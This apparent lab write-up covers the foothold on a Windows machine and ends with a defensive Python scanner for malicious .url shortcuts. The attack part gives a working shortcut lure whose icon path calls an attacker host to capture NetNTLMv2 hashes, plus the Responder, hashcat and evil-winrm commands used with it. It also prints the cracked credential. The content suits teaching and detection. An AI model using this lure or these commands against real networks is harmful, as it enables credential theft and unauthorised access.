Foothold

$ netexec smb 192.168.154.172 -u 'Guest' -p '' --shares
$ smbclient '\\192.168.213.172\DocumentsShare' -U Guest%''
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Aug 30 07:51:55 2024
  ..                                  D        0  Fri Aug 30 07:51:55 2024

		7706623 blocks of size 4096. 725530 blocks available

The share is readable and writable (RW), so we can upload a malicious document that whoever browses the folder will act on.

Create a shortcut whose icon points back to us: when a user opens the share in Explorer, it tries to load the icon from our UNC path and authenticates to us with their NetNTLMv2 hash. The %USERNAME% in the icon name is expanded on the client, so the requested filename tells us which user triggered it.

[InternetShortcut]
URL=pwned
WorkingDirectory=pwned
IconFile=\\192.168.45.233\%USERNAME%.icon
IconIndex=1
$ sudo responder -I tun0 -A
$ hashcat -m 5600 anirudh.hash ~/rockyou.txt -O 
anirudh:SecureHM
$ netexec winrm 192.168.229.172 -u 'anirudh' -p 'SecureHM'
$ evil-winrm -u 'anirudh' -p 'SecureHM' -i 192.168.229.172

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami ; type C:\Users\anirudh\Desktop\local.txt ; ipconfig
vault\anirudh
2f62d26d944f9393461ee79dc24b346b

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.229.172
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.229.254
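As a defensive counterpart to the lure dropped on DocumentsShare above, here is an added example (my own code, not part of the original writeup): a Python scanner that parses .url files found on a share and flags IconFile, URL or WorkingDirectory entries that point to a UNC host outside an allowlist. The constructed sample lure reuses the attacker IP from the writeup; the benign sample and the allowlist hosts are placeholders.

```python
import configparser
import re
from pathlib import Path

# A UNC path looks like \\host\share\... ; capture the host portion.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")
# Fields of an [InternetShortcut] that Explorer may resolve over the network.
WATCHED_KEYS = ("iconfile", "url", "workingdirectory")


def unc_host(value):
    """Return the host of a UNC path, or None when the value is not UNC."""
    match = UNC_RE.match(value.strip())
    return match.group(1) if match else None


def analyze_url_file(text, trusted_hosts=()):
    """Parse an INI-style .url body and return (key, value, host) findings for
    watched fields pointing at a UNC host outside trusted_hosts; else []."""
    parser = configparser.ConfigParser(interpolation=None)
    try:
        parser.read_string(text)
    except configparser.Error:  # not a valid shortcut file at all
        return []
    if not parser.has_section("InternetShortcut"):
        return []
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for key, value in parser.items("InternetShortcut"):  # keys are lowercased
        host = unc_host(value) if key in WATCHED_KEYS else None
        if host and host.lower() not in trusted:
            findings.append((key, value, host))
    return findings


def scan_share(root, trusted_hosts=()):
    """Walk a mounted share and map each suspicious .url path to its findings."""
    hits = {}
    for path in Path(root).rglob("*.url"):
        found = analyze_url_file(path.read_text(errors="replace"), trusted_hosts)
        if found:
            hits[str(path)] = found
    return hits


# Constructed sample mirroring the lure from the writeup (attacker IP as given there).
SAMPLE_LURE = "[InternetShortcut]\nURL=pwned\nWorkingDirectory=pwned\n" \
    "IconFile=\\\\192.168.45.233\\%USERNAME%.icon\nIconIndex=1\n"
# Constructed benign shortcut whose icon lives on the local disk.
SAMPLE_BENIGN = "[InternetShortcut]\nURL=https://intranet.example/\n" \
    "IconFile=C:\\Windows\\System32\\shell32.dll\nIconIndex=3\n"
```

Run scan_share() against a mount of the share from a monitoring host, passing your own file servers as trusted_hosts, and alert on any hit.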
